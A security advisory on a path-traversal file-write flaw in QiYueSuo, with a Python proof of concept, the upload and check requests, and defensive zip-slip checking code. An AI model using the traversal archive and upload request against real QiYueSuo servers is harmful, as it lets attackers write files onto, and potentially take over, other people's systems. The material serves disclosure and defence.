Vulnerability Description
On 7 July 2025, QiYueSuo (契约锁) released a security patch fixing a remote code execution vulnerability. The flaw lets an unauthenticated attacker execute arbitrary code on the server. Because it is easy to exploit, affected users are advised to apply the security patch promptly. The PoC below exercises the underlying primitive, an arbitrary file write: an uploaded .ofd (a zip container) whose entry names contain `../` sequences is extracted without path sanitisation, so the attacker chooses where the entry lands. The PoC only writes a harmless .css marker and reads it back over HTTP; it does not itself run code.
Affected versions:
4.3.8 <= QiYueSuo <= 5.x.x && patch version < 2.1.8
4.0.x <= QiYueSuo <= 4.3.7 && patch version < 1.3.8
import zipfile
from base64 import b64encode
import tempfile

# Build an OFD-style zip whose entry names climb out of the extraction directory.
# The entry is only a .css marker, so a successful write is visible over HTTP
# without executing anything on the server.
with tempfile.NamedTemporaryFile(suffix='.zip') as tmp_zip:
    with zipfile.ZipFile(tmp_zip, 'w') as new_zip:
        file_name = '8b65bc0880023dc52a55'
        # Linux: after 500 '../' the path sits at '/', and /proc/self/cwd resolves to the
        # server process's working directory, so the install path need not be known
        new_zip.writestr(
            f"{'../' * 500}proc/self/cwd/resources/css/{file_name}.css",
            b"https://www.qiyuesuo.com/more/security/servicepack"
        )
        # Windows: there is no /proc, so a fixed install directory name is used instead
        new_zip.writestr(
            f"{'../' * 500}qiyuesuo/security/resources/css/{file_name}.css",
            b"https://www.qiyuesuo.com/more/security/servicepack"
        )
    tmp_zip.seek(0)
    # Base64 of the finished archive; it is decoded into the multipart body of the upload request
    print(b64encode(tmp_zip.read()).decode())
Upload the archive as an .ofd file (the body is the decoded zip from the script above):

POST /pdfverifier HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=f11cab403f27e81fb32bf82855f49809

--f11cab403f27e81fb32bf82855f49809
Content-Disposition: form-data; name="file"; filename="f11cab403f27e81fb32bf82855f49809.ofd"

{{base64dec(archive contents)}}
--f11cab403f27e81fb32bf82855f49809--

Verify the write by requesting the marker file; a response containing the servicepack URL confirms the traversal entry was extracted:

GET /qyswebapp/assets/css/8b65bc0880023dc52a55.css HTTP/1.1
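The defensive counterpart to the PoC, added here as an example that is not part of the original write-up or of the vendor's code: a zip-slip check that flags every archive entry escaping the extraction directory (absolute paths, drive letters, or `../` climbs, with backslashes treated as separators because a Windows extractor would treat them that way), and a `safe_extract` that refuses the whole archive before writing anything. The archives are constructed in memory with the same two traversal entries the PoC uses; the entry names, the marker content, and the extraction directory are assumptions for the demo, not the product's real layout.

```python
import io
import os
import tempfile
import zipfile
from typing import List

# Constructed marker content, mirroring the PoC's harmless "write a URL into a .css" payload.
MARKER = b"https://www.qiyuesuo.com/more/security/servicepack"


def build_poc_zip(depth: int = 500) -> bytes:
    """Constructed sample: an archive with the same two traversal entries the PoC writes.
    An OFD file is a zip container, so this stands in for the uploaded .ofd."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("../" * depth + "proc/self/cwd/resources/css/poc.css", MARKER)
        zf.writestr("../" * depth + "qiyuesuo/security/resources/css/poc.css", MARKER)
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Constructed sample: an archive whose entries all stay inside the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("OFD.xml", b"<ofd:OFD/>")
        zf.writestr("Doc_0/Document.xml", b"<ofd:Document/>")
    return buf.getvalue()


def _resolve(dest: str, name: str) -> str:
    """Join an entry name onto dest and normalise '..' segments without touching the disk.
    Backslashes are converted first: the zip spec only uses '/', but a Windows extractor
    would honour '\\' as a separator, so the check must see the same path it would."""
    return os.path.abspath(os.path.join(dest, name.replace("\\", "/")))


def unsafe_entries(zip_bytes: bytes, dest: str) -> List[str]:
    """Return every entry whose normalised path would land outside dest."""
    dest_abs = os.path.abspath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            # Absolute paths and drive letters escape no matter how they normalise.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                bad.append(info.filename)
                continue
            # A '../' climb shows up as a common prefix shorter than dest itself.
            if os.path.commonpath([dest_abs, _resolve(dest_abs, name)]) != dest_abs:
                bad.append(info.filename)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Reject the whole archive if any entry escapes dest, otherwise extract it and return
    the written paths. Checking everything first avoids leaving a half-extracted archive."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"zip entry escapes extraction dir {dest!r}: {bad[0]!r}")
    dest_abs = os.path.abspath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = _resolve(dest_abs, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def run_demo() -> dict:
    """Run both archives against a fresh temporary directory and report what happened."""
    dest = tempfile.mkdtemp(prefix="ofd_extract_")
    result = {"poc_flagged": unsafe_entries(build_poc_zip(), dest)}
    try:
        safe_extract(build_poc_zip(), dest)
        result["poc_rejected"] = False
    except ValueError:
        result["poc_rejected"] = True
    result["benign_written"] = safe_extract(build_benign_zip(), dest)
    prefix = os.path.abspath(dest) + os.sep
    result["leaked_outside_dest"] = [p for p in result["benign_written"] if not p.startswith(prefix)]
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The check deliberately uses `os.path.abspath` rather than `realpath`: it models what a naive `os.path.join(dest, name)` extractor would write to, without following symlinks such as `/proc/self/cwd`, so the verdict is the same on any host. A name that climbs out and back into `dest` (`../<dest basename>/x`) normalises to an inside path and is accepted, which matches where it would actually be written.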